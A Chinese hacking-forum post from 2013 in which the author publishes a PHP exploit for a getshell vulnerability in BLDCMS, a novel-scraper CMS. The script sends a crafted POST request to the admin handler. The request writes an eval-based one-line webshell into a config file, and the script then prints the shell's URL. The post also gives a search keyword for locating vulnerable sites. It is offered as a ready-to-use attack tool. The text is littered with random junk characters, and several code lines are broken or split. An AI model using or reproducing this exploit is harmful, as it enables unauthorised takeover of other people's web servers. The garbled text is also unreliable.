之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
) A8 S Z, Q7 f! L' C+ N! u C0 Q) C2 u7 E& N+ ?
1 W) g$ s/ P+ [. Q# b话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 " ?' e6 s- P0 Y( {$ _7 a0 e+ n
+ M# |4 s( |9 d( N5 ~" l8 U0 |2 \既然都有人发了 我就把我之前写好的EXP放出来吧/ L$ @4 H7 D8 u$ c2 M3 ?) ]* l
' i( Q4 f3 r$ I8 mview source print?01.php;">% |5 H; b8 O, W8 F& D# n
02.<!--?php8 |! {" m( S8 z9 p3 O
03.echo "-------------------------------------------------------------------9 {3 a9 y' j4 n1 }: c: A' R
04.
# E+ n- S+ f6 N+ l6 U; {05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
# L' [% K! x9 h" B: @3 |06. ! v* }4 q9 C7 ?. g, ^
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
8 N R6 s' |$ f. b( c! q08.
8 N8 l& q+ g! Y3 ^09.QQ:981009941\r\n 2013.3.21\r\n
# ^8 V. z5 f" F, ]$ W# D0 {10.
0 m- m7 C |/ F2 L% T- f" u4 w11.
8 K' u, O- x) I4 G m& w12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码# f# T/ f7 N6 r0 C
13.
) X' W( {7 |# u14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 t' S" @. b0 E' c% y15. ) J1 m5 j; w1 Q, l
16.--------------------------------------------------------------------\r\n";1 ?. [' ^0 o O1 f( M6 v
17.$url=$argv[1];
, K' ?7 s: U# ^ L3 s18.$dir=$argv[2];7 K2 T( o1 g( o C' [/ E7 C
19.$pass=$argv[3];& [5 q+ b+ X7 F% T5 k/ @9 b
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';2 o5 w3 A+ X# B: Z' n; p8 p9 F
21.if (emptyempty($pass)||emptyempty($url))
+ t3 `1 g& g4 _* _) L22.{exit("请输入参数");}* a) M& A' `1 Q$ J+ K7 k, }
23.else) q9 @& e; |! l
24.{- p0 s+ N0 g1 x1 g3 z! t. J
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev. o7 S. T4 e* I2 [8 ?, G
26. ' |5 e2 z+ b4 Y, a4 p3 f; k, K, t
27.al;4 @7 v, Z# b6 `$ V
28.$length = strlen($fuckdata);
# z, R0 w0 G2 h! T29.function getshell($url,$pass)9 K& B4 s" [; ~5 C* @
30.{
! r) I( s, ~( V! \" `6 I31.global $url,$dir,$pass,$eval,$length,$fuckdata;2 _ t3 Q; ]1 O& m4 [
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ q: q% n5 u4 m( P, x/ p33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";% J$ D: e) `2 c. C W
34.$header .= "User-Agent: MSIE\r\n";9 u) |9 p0 E+ E3 v/ Z; y1 f
35.$header .= "Host:".$url."\r\n";0 m5 x l) w. e* o0 D0 ?& r; C
36.$header .= "Content-Length: ".$length."\r\n";
. O# i$ g% @2 i37.$header .= "Connection: Close\r\n";3 \, h" w; l, }, }" H, D8 L
38.$header .="\r\n";
) a3 I5 @" n' `6 S+ I0 K" Z' ]39.$header .= $fuckdata."\r\n\r\n";
. d4 N4 E0 t! |$ l40.$fp = fsockopen($url, 80,$errno,$errstr,15);
0 o+ m# G- ]9 E* g9 n' E9 U5 S41.if (!$fp)
3 W6 c7 e! m$ O6 F9 k42.{
2 [( K6 N. i& ]( p. Q2 U43.exit ("利用失败:请检查指定目标是否能正常打开");
7 J6 u' ] C* D4 b) l44.}; I: K5 ^6 [5 |: R
45.else{ if (!fputs($fp,$header))
% @9 v. m) a7 V, D1 G9 M46.{exit ("利用失败");}
' ^- Y0 T; @# q47.else0 ~/ t1 z1 F# D' `/ U) @" g
48.{
5 g1 u# S( m$ m49.$receive = '';
. D; \, k0 L' [50.while (!feof($fp)) {
+ u2 R* y1 B; c4 f2 [, y51.$receive .= @fgets($fp, 1000);
8 r* H3 p1 X& A0 R52.}
e7 r; E0 R7 G& |' ^53.@fclose($fp);
; h$ u; Z# X2 T- L' W54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
+ E' D* f2 [3 }: W8 N55.
6 D4 ^: Y: D5 z56.GPC是否=off)";
3 |% H- Q5 c, ^57.}}/ J$ V- V) {& K( I+ l' p* o7 s6 @
58.}* v: W4 T7 S$ r; M; i* [
59.}
& [9 y) o" L) v r3 F60.getshell($url,$pass);6 |) ^) ]/ C8 |5 v
61.?-->
+ B+ l/ d' d: b ' Z J& y4 t) D4 G: v1 w: e/ F
1 c8 p9 ^3 ]. V- |4 M0 ^
' [- S1 a' U5 p# U% Qby 数据流
/ X5 ~6 {: a* ? |
发表于 2013-3-26 20:49:10
收藏
支持
反对